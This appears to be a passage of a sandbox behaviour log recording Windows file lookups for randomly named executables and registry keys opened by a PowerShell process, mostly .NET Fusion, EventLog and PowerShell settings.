Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\get-SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI

Searched a directory for the name: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI

C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\get-2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\get-SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.BAT

Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\system32\2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\system32\SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\system32\get-2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.JS

Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\system32\get-SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe
Registry Created
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
Registry Opened
HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
HKCU\Control Panel\International
HKCU\Environment
HKCU\Software\Microsoft\.NETFramework
HKCU\Software\Microsoft\Fusion
HKCU\Software\Microsoft\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
HKCU\Software\Microsoft\Installer\Assemblies\Global
HKLM\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
HKLM\SOFTWARE\Classes\Installer\Assemblies\Global
HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKLM\SOFTWARE\Microsoft\Fusion
HKLM\SOFTWARE\Microsoft\PowerShell
HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-
500\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-
500\Installer\Assemblies\Global
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKLM\SYSTEM\CurrentControlSet\Services\EventLog
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKLM\Software\Microsoft\.NETFramework
HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch
HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKLM\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKLM\Software\Microsoft\Fusion
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\20fe3c1a\56aa3966
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2b1373f4\4f4f14cc
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e571dbb\41bddfc6
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\607f993e\7d1d7403
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\a94d4ab\5a294d6
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management.resources_en-
US_31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a
HKLM\Software\Microsoft\PowerShell
HKLM\Software\Microsoft\PowerShell\1
HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
HKLM\Software\Microsoft\StrongName
HKLM\Software\Microsoft\Windows NT\CurrentVersion
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2969830022-2362906686-2146684197-500
